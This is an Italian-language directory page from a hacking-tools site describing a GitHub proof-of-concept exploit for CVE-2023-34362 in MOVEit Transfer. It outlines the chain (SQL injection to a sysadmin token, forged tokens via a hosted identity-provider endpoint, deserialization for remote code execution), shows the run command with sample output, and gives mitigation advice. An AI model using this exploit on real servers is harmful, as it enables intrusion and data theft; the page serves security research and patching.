Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-34362 — POC per CVE-2023-34362 che colpisce MOVEit Transfer | Kitploit
Strumenti/GitHubGitHub/malwareman007/cve-2023-34362
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubmalwareman007/cve-2023-34362

CVE-2023-34362

POC per CVE-2023-34362 che colpisce MOVEit Transfer

Vedi Repository
1023 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-34362

POC per CVE-2023-34362 che interessa MOVEit Transfer

Analisi Tecnica

Un'analisi tecnica della causa principale della vulnerabilità è disponibile sul blog:

Riepilogo

  • Questo POC sfrutta un'iniezione SQL per ottenere un token di accesso API da sysadmin e poi usa tale accesso per abusare di una chiamata di deserializzazione al fine di ottenere l'esecuzione di codice remoto.

  • Questo POC deve raggiungere un endpoint Identity Provider che ospita certificati RS256 adatti, utilizzati per forgiare token utente arbitrari - di default questo POC utilizza il nostro endpoint IDP ospitato su AWS.

  • L'exploit scriverà di default un file in C:\Windows\Temp\message.txt. Payload alternativi possono essere generati utilizzando il progetto ysoserial.net.

Utilizzo

root@kitploit:~
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file

Mitigazioni

Aggiorna all'ultima versione o mitiga seguendo le istruzioni contenute nel Progress Advisory

  • https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023

Dichiarazione di non responsabilità

Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzati. I maintainer del progetto non sono responsabili dell'uso improprio del software. Usalo con responsabilità.

Scarica lo strumento